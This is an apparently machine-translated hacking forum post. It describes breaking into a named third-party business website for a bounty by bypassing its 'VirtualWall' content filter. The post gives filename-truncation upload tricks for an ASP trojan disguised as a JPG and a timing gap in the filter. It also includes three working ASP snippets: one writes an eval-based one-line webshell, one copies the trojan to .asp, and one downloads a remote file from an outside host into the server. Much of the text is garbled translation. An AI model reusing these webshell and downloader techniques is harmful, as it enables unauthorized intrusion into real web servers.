Record a non-mainstream pass through VirtualWall illegal information interception expert

 

Laruence. Take notes. The last night, 30JB in the jar offered a reward for VirtualWall illegal information interception experts.
As a diaosi. Why can't we see JB. So PM tried.
Open the target site and check out the business website building system that is V2.5 easy to think business network huicong network style!
Take a look and use NC to submit and register a user name for woc. asp. The system automatically creates a folder named after the user name.
Then go to the album management page and upload an ASP Trojan file with the suffix JPG. I thought it was second.

Nima's
I was puzzled by the interception. I thought it was possible that the trojan was not encrypted enough, so I dragged a sentence to merge images.
You can still intercept it, So I captured the packet and looked at the URL of the upload address.

Http://www.bkjia.com/inc/upload. asp? TMode = 8 & istwo = 1 & utype = vipinfo & guser = woc. asp

It is found that the last parameter is the user name, that is, the last parameter can be used to upload files to any directory.
I want to change it to woc.asp;.jpg and submit it to shell with NC truncation.

We also tried woc.asa0000.jpg woc. cer; jpg woc,cdx0000.jpg.
The asa was intercepted, but it was found that CER and CDX could not parse and directly display the source code. Why didn't cer cdx intercept it, and my SHELL source code was also uploaded,
Isn't it possible to make a bid of 30 JB in tears for 30 minutes?
After several minutes in the background, I couldn't find a good way to pull the SHELL. Suddenly a chrysanthemum fell from the sky, and I seemed to find something
In fact, nothing is found, but the illegal information is intercepted by experts to filter directories such as a. asp a. asa and file names of asp;. asa ;.
We didn't intercept the data we PUT. This is not a perfect solution for this set of interception experts,
Which of the following is a first-class information interception system? It is very painful to filter many characters. Someone has to ask, since you cannot directly PUT
With the ASP suffix, let's see how you get the SHELL. I have to tell you one thing.
The interception system may have been touched by me for 30 minutes during my tears. I have no intention of opening my SHELL. Resolved
However, it takes only a few seconds to parse the time.
Later, I quietly followed this expert.
This expert was found to have a certain rule that nothing was intercepted for a few seconds on the hour or whole minute.
In just a few seconds, it should be a way to break through the interception experts, and then stare at the computer for more than an hour.
So I immediately turned my mind into a new one.
1. directly generate a shell statement using FSO in the upper-level directory (because the SHELL cannot be generated in A. ASP Directory, it will be intercepted relentlessly)
2. Use FSO to directly copy the uploaded Trojan file suffixed with JPG to the ASP file in the parent directory.
3. No FSO download from XMLHTTP

Here I will first list the code I used
1. FSO generates a sentence of code

 

<%Dim Content,Fso,FoutSet Fso=Server.CreateObject("Scripting.FileSystemObject")Set Fout=Fso.CreateTextFile(Server.Mappath("../123.asp"))Fout.WriteLine"<script language=VBScript runat=server>if request(chr(35))<>"""" then"Fout.WriteLine"response.clear"Fout.WriteLine"ExecuteGlobal request(chr(35))"Fout.WriteLine"end if"Fout.WriteLine"</script>"Fout.Write ContentFout.CloseSet Fout=NothingSet Fso=Nothing%>

 

2. FSO copy the file code

 

<% TempSource = Server. mapPath ("/921196360.jpg") 'source file TempEnd = Server. mapPath (folder &".. /4040.asp") 'call CopyFiles (TempSource, TempEnd) Function CopyFiles (TempSource, TempEnd) Dim FSO Set FSO = Server. createObject ("Scripting. fileSystemObject ") if fso. fileExists (TempEnd) then Response. write "the target backup file <B>" & TempEnd & "</B> already exists. Please delete it first! "Set FSO = Nothing Exit Function End if fso. fileExists (TempSource) Then Else Response. write "the source data file to be copied <B>" & TempSource & "</B> does not exist! "Set FSO = Nothing Exit Function End If FSO. copyFile TempSource, TempEnd Response. write "successfully copied the file <B>" & TempSource & "</B> to <B>" & TempEnd & "</B>" Set FSO = Nothing End Function %>

 

3 XMLHTTP No download file code used by FSO

 

<% Set xPost = CreateObject ("Microsoft. XMLHTTP ") xPost. open "GET", "http://www.xxxxx.com/921994421.jpg", FalsexPost. send () Set sGet = CreateObject ("ADODB. stream ") sGet. mode = 3sGet. type = 1sGet. open () sGet. write (xPost. responseBody) sGet. saveToFile Server. mapPath (".. /system. asp "), 2 set sGet = nothingset sPOST = nothingresponse. write ("Download successful! ") %>

 

Because I cannot barely understand ASP. So the above Code is not written by myself. It is the result of several hours of turning over Baidu and GG.
Continue
When I wrote the first code, I quickly uploaded it to my website,
Looking at the time, I refreshed my SHELL path almost all the time.
The Code was executed again,

As you can see, it has been a long time to find that the target website has not enabled FSO.
FSO indicates File System Object. The above two ASP codes use the FSO component to write SHELL and copy files.
I was crying,
So I started Baidu again and found the SHELL method without FSO,
The time passed by 1 minute 1 second. Look at the bright sky outside the window.
Where did my friend get an ASP file for XMLHTTP File Download?
This is code 3 I posted. Continue with the above process,
I changed the suffix to JPG and threw it to the target station. So I began to wait for the expert to take a break.
Try while watching and alignside.

You can see it. The file is successfully downloaded.
(This figure shows how to test a website tonight, because I don't want to test it on the target machine any more. It is a waste of time to wait for an expert to take a rest)
Open the website and enter system. asp, Which is blank. You have downloaded one sentence.
Start the connection end with one sentence, and the next step is the dog blood. Ma'ama

I am very excited. I am grateful to anyone who sent Me 100JB, but it seems that I didn't send it.
----------------------------
Sometimes one night or even a few days for a single goal, only to get the SHELL for a short second.
It is estimated that this should happen frequently. Well, this is my non-mainstream Bypass Method,
The method is to use the interception experts to download our WEBSHELL in just a few seconds.
It's just that the seconds are too difficult to grasp. The price for one night is 30JB.
Which second does the Forum charge for MD5. Nima is faster than others.
Envy Me, And the profitable business is all gone
Of course, I don't know if all the interception experts of this version will have a few seconds to detect it.
If so, you will surely be able to do this in the future, and the experts will have a better way to announce it.
Learning
Reprinted from: NO. THINKING